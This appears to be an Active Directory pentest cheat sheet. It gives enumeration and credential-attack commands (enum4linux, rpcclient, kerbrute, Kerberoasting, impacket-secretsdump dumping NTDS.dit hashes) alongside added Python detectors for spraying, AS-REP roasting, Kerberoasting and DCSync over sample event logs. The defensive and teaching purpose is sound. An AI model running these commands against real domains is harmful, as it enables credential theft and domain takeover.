Active Directory
Attack Workflow
- Determine what ports are open
  - Enumerate with
- Enumerate AD information
  - Domain info
    - rpcclient
    - enum4linux
  - Get list of users
    - If list not available, bruteforce usernames
  - Determine if Kerberos pre-auth exists
  - Determine which users have SPNs (Service Principal Names)
enum4linux
Used to enumerate a huge amount of AD information from the command line.
enum4linux -a 10.1.1.10 # Attempts to enumerate everything at target
enum4linux -u administrator -p password -U 10.1.1.10 # Use stolen creds to enumerate all users
enum4linux -S 10.1.1.10 # Attempt to gather SMB shares
rpcclient
Used to enumerate information about a system over RPC.
Gather a list of domain accounts with rpcclient and save them to a file:
rpcclient -U 'GOBLINS\printerldap%SecurePassword1' 10.0.0.1 -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt
Password Spraying
A tool such as Talon can run password spray attacks across an AD environment.
Kerberos
Kerbrute is used to run various Kerberos attacks. Written in Go. https://github.com/ropnop/kerbrute
./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt
Kerberoasting
Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hash to crack. We must find all accounts in AD which have an SPN (Service Principal Name), then request RC4 tickets from the DC.
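The three Kerberos techniques above (password spraying, user enumeration against accounts without pre-auth, and Kerberoasting) each leave a distinctive pattern in the domain controller's Security log. The following is an added detection example, not code from the page or from any of the tools it names: it runs over constructed sample events shaped like Windows events 4771, 4768 and 4769 (hypothetical hosts, users and times) and flags one source failing pre-auth for many accounts, TGT requests for accounts with pre-auth disabled that were issued with RC4, and one account requesting RC4 service tickets for many service accounts in a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Security-log events (hypothetical hosts, users and
# times; not telemetry from the page). Field names follow the Windows
# event XML for 4771 / 4768 / 4769.
SAMPLE_EVENTS = [
    # 4771 pre-auth failures, Status 0x18 = bad password. Six different
    # accounts from one source within six seconds: a spray.
    *[{"EventID": 4771, "TimeCreated": f"2024-05-01T09:00:0{i}", "Status": "0x18",
       "TargetUserName": u, "IpAddress": "10.0.0.50"}
      for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"], 1)],
    # One user mistyping their own password twice: not a spray.
    {"EventID": 4771, "TimeCreated": "2024-05-01T09:30:00", "Status": "0x18",
     "TargetUserName": "alice", "IpAddress": "10.0.0.7"},
    {"EventID": 4771, "TimeCreated": "2024-05-01T09:30:05", "Status": "0x18",
     "TargetUserName": "alice", "IpAddress": "10.0.0.7"},
    # 4768 TGT requests: PreAuthType 0 means no pre-auth was required, and
    # RC4 (0x17) makes the AS-REP crackable offline.
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:05:00", "TargetUserName": "svc_legacy",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:05:10", "TargetUserName": "alice",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.7"},
    # 4769 service-ticket requests: one account asking for RC4 tickets to
    # four different service accounts within seconds is a roast.
    *[{"EventID": 4769, "TimeCreated": f"2024-05-01T09:10:0{i}", "TargetUserName": "bob@CORP.LOCAL",
       "ServiceName": s, "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"}
      for i, s in enumerate(["svc_sql", "svc_web", "svc_rds", "svc_backup"], 1)],
    # Normal AES ticket for the one service the user actually uses.
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:12:00", "TargetUserName": "carol@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.8"},
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def _distinct_in_window(pairs, window, threshold):
    """pairs: (timestamp, value). Slide a time window over the sorted pairs
    and return the largest set of distinct values seen inside one window,
    sorted, if it reaches `threshold`; otherwise None."""
    pairs = sorted(pairs)
    best, start = None, 0
    for end in range(len(pairs)):
        while pairs[end][0] - pairs[start][0] > window:
            start += 1
        values = {v for _, v in pairs[start:end + 1]}
        if len(values) >= threshold and (best is None or len(values) > len(best)):
            best = values
    return sorted(best) if best is not None else None


def detect_password_spray(events, window=timedelta(minutes=5), min_users=5):
    """{source_ip: [users]} for sources that failed pre-auth with a bad
    password (4771, 0x18) for at least min_users distinct accounts in window."""
    by_source = defaultdict(list)
    for e in events:
        if e["EventID"] == 4771 and e.get("Status") == "0x18":
            by_source[e["IpAddress"]].append((_ts(e), e["TargetUserName"]))
    hits = {}
    for ip, attempts in by_source.items():
        users = _distinct_in_window(attempts, window, min_users)
        if users:
            hits[ip] = users
    return hits


def detect_asrep_roastable(events):
    """(user, ip) for TGTs issued without pre-auth (PreAuthType 0) using RC4.
    Each such account should have pre-auth re-enabled and AES enforced."""
    return sorted({(e["TargetUserName"], e["IpAddress"]) for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == "0"
                   and e.get("TicketEncryptionType") == "0x17"})


def detect_kerberoasting(events, window=timedelta(minutes=10), min_spns=3):
    """{requesting_account: [service accounts]} when one account obtained RC4
    (0x17) service tickets for at least min_spns distinct services in window."""
    by_user = defaultdict(list)
    for e in events:
        if e["EventID"] == 4769 and e.get("TicketEncryptionType") == "0x17":
            by_user[e["TargetUserName"]].append((_ts(e), e["ServiceName"]))
    hits = {}
    for user, reqs in by_user.items():
        spns = _distinct_in_window(reqs, window, min_spns)
        if spns:
            hits[user] = spns
    return hits


if __name__ == "__main__":
    print("spray:", detect_password_spray(SAMPLE_EVENTS))
    print("asrep:", detect_asrep_roastable(SAMPLE_EVENTS))
    print("roast:", detect_kerberoasting(SAMPLE_EVENTS))
```

The thresholds and windows are assumptions to tune per environment; the point is that each detector keys on the signal the attack cannot avoid (many distinct accounts from one source, tickets issued without pre-auth, many RC4 TGS requests from one principal). Enforcing AES-only on service accounts and enabling pre-auth everywhere removes the RC4 signal entirely, which is the mitigation these detections complement.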
secretsdump
Used to extract hashes from a server. The command below pulls the NTDS.dit contents from the DC, assuming you have an account with the required permissions.
impacket-secretsdump -just-dc backup:[email protected]
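Pulling NTDS.dit contents this way means an ordinary account is asking the DC to replicate directory changes, which only other domain controllers (and a few sync services) should ever do. With "Audit Directory Service Access" enabled and a SACL on the domain object, that request appears as event 4662 with the Control Access mask (0x100) and one of the replication property GUIDs. The following is an added detection example, not code from the page or from impacket, run over constructed 4662 events with hypothetical account names; the GUIDs are the well-known DS-Replication control-access rights.

```python
import re

# Well-known control-access right GUIDs that grant directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed sample 4662 events (hypothetical accounts; not from the page).
SAMPLE_4662 = [
    # Routine DC-to-DC replication: subject is a DC computer account.
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # A user account requesting both replication rights: secretsdump-style.
    {"EventID": 4662, "SubjectUserName": "backup", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # An allow-listed directory sync account doing its job.
    {"EventID": 4662, "SubjectUserName": "MSOL_sync", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Unrelated object access (read of a user object), ignored.
    {"EventID": 4662, "SubjectUserName": "alice", "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def detect_dcsync(events, known_dcs=frozenset(), allowed_principals=frozenset()):
    """Return [(subject, [right names])] for 4662 events that exercise a
    replication right with the Control Access mask, from any principal that
    is neither a known DC computer account nor explicitly allowed."""
    hits = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        if int(e.get("AccessMask", "0x0"), 16) & 0x100 == 0:
            continue
        rights = sorted({REPLICATION_RIGHTS[g.lower()]
                         for g in GUID_RE.findall(e.get("Properties", ""))
                         if g.lower() in REPLICATION_RIGHTS})
        if not rights:
            continue
        subject = e["SubjectUserName"]
        if subject in known_dcs or subject in allowed_principals:
            continue
        hits.append((subject, rights))
    return hits


if __name__ == "__main__":
    print(detect_dcsync(SAMPLE_4662, known_dcs={"DC01$", "DC02$"},
                        allowed_principals={"MSOL_sync"}))
```

The allow list should be short and reviewed: anything holding Get-Changes-All on the domain head can reproduce every password hash, so the same rule doubles as an audit of who has been granted those rights.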

https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg